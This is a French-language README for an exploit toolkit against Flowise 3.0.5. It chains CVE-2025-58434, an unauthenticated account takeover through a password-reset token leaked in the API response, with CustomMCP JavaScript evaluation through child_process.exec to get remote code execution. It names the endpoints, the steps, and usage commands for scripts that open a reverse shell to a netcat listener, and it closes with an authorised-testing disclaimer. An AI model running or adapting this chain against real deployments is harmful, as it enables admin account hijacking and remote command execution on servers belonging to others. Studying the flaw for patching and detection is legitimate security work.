
Chaîne d'exploitation pour Flowise 3.0.5 : prise de contrôle de compte non authentifiée via la divulgation du jeton de réinitialisation de mot de passe (CVE-2025-58434) enchaînée à l'évaluation JavaScript CustomMCP pour l'exécution de code à distance.
Deux problèmes Flowise 3.0.5, enchaînés :
POST /api/v1/account/forgot-password renvoie le tempToken de l'utilisateur cible
directement dans la réponse JSON. Fournissez-le à POST /api/v1/account/reset-password
pour définir un mot de passe connu pour n'importe quel compte, y compris le premier admin -> prise
de contrôle totale de compte non authentifiée.mcpServerConfig CustomMCP.
Avec une session et une clé API d'espace de travail (issues de l'étape 1),
POST /api/v1/node-load-method/customMCP avec loadMethod=listActions
évalue la chaîne mcpServerConfig comme JavaScript dans le processus Flowise,
donnant une RCE . (Problème Flowise distinct utilisé
ici uniquement pour transformer l'ATO en exécution de code ; aucun CVE attribué au moment de
la rédaction.)require('child_process').exec()CVE : CVE-2025-58434
python3 -m pip install requests
flowise_ato_foothold.py - chaîne complète (ATO -> clé API -> reverse shell CustomMCP)python3 flowise_ato_foothold.py <LHOST> <LPORT> [TARGET_IP] [FLOWISE_VHOST]
# ayez `nc -lvnp <LPORT>` prêt
flowise_customMCP_rce.py - RCE CustomMCP uniquement (nécessite une clé API)python3 flowise_customMCP_rce.py '<commande>' '<FLOWISE_API_KEY>'
Pour les tests de sécurité autorisés et l'éducation uniquement. Exécutez ceci uniquement contre des systèmes que vous possédez ou pour lesquels vous avez une autorisation écrite explicite de tester.
Auteur : r3vpwnx